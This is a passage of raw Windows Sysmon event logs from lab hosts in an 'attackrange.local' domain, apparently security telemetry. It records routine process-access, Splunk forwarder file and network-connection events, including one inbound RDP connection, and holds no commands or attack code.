08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055303Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055302Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055301Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055300Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055299Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055298Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055297Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055296Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055295Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055294Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055293Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055292Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055291Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055290Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055289Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055288Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055287Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.203{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71E4E1FDE76EFFC5497FC776892FF49F,SHA256=4FE4700143654CE2C4406FD73EBAE549AA16C0771F34129EBB86735E44B5A1AA,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000810740Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:37.667{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BD12DB9BF3FEFE28F7887390124E543,SHA256=AA21787F7DDB29E209636E265BBB5CA0CFBFD3825158D87235E0F12E4BB76488,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055362Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:37.233{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A420A6E0B2449355CF97CB261C522906,SHA256=D3958CADA7BD9C2B5EFD4305E3501B2689779AF26D0B96D3F6FFA70816BD94B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810741Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:38.699{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB30F544DEC6EE53EE2E6B48DB140802,SHA256=D139519B73E931989502A5E15D4D919FA5E53A5438DBE2A85B82364EA8F22E02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055364Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:38.701{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL 
SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=49347CFA0E7CE22F6019DEC53590445C,SHA256=6F99B8D304255C8F5E35FF6FC53A67C78E19491725E27714157A13C26A6B1A00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055363Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:38.248{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE2FB4A16BDCEE5DFB952FE8A3135237,SHA256=F5B85B6BA6B7416B1B27E81A63F3A523609A0A55AE56D10450790B6BD8024DDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810742Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:39.730{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FF523D8C5052C0845762F9A8E773E5B,SHA256=4141DFFCE918821249E6AE8A96BC956829A6103C6AEE724E2D1541DCE25D676D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055367Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:39.403{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program 
Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055366Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:39.403{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055365Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:39.249{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FBDBB5A315464A3ABF62E645BCF7B6A,SHA256=F0C3F7AD80C45DEFFBDC35395AA2FE7ECAE009F2E7702A0BBF59C8BCF0F240B3,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000810744Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:40.745{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F5513665250F908AE0457BE545DFFB6,SHA256=A5AC413E4CDC7F4AE16C3972C9FD429DE95CA5CD26A2A3523A4C64CF50AF3F29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055368Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:40.265{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=152E18FFE660555AE6C13AF2272BA9D9,SHA256=2F939A948B6C7445684727DA729C2E14F5E1C05533697EE4B63B128FD22447BE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810743Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:38.207{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57487-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810745Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:41.745{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BFEC0458842D96C2014F9A9451F1122,SHA256=C523B6280B67FDDD0FF4A89F88425E7039020446401782ABF91F8C04ECAFA4E9,IMPHASH=00000000000000000000000000000000falsetrue 
354300x80000000000000001055370Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:33.658{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61999-false10.0.1.12-8000- 23542300x80000000000000001055369Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:41.283{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=688B5F48886C8FB175050AB42A5C79E0,SHA256=03822314F80A5F16AF2989C3C36709FA012886D37DA7D01C2F87959DBAD96D4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810749Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:42.761{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5155C27AC5F481D81019646A35D35C2C,SHA256=C57A8E56C5A6F69782A5B48CEB989B589D51AB04CA20C54D59D55880211DCE46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055371Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:42.301{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=538BCD068DA988DA4D6BE08A3D612254,SHA256=A632E5C63A5C498D600D70B268715CCB22B626FD694C6BA931A43599824321CE,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000810748Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:42.652{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F1AAB564721D6EF7704F7D48944815EE,SHA256=023378C4B95A7858F932DFC20D45699167CF88526A5E8C26C02C3A19441CB360,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810747Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:42.652{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=311F16367C1C5724D3CF5C3A003115A1,SHA256=D476E30BACDE6F4F7ECA4A0692D66614AE959520E2E36602DFA824FA71E2C67C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810746Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:40.871{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-1131-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000810751Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:43.761{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FF12E2D45E4F29B461046F5248F469E,SHA256=2C16AA7E697FE8C45276E4986E70E40954E7864A2123A1883ECC77DFCDD15E17,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055373Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:35.160{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57488-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001055372Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:43.331{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35DC6ACD5A8667913B181E40ECC5D0F5,SHA256=5F8F5366B81CD333C7A304C8FE5ED7667CD85042DDECCE04163E46F40B431D4F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810750Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:41.787{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57488-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000810752Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:44.777{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 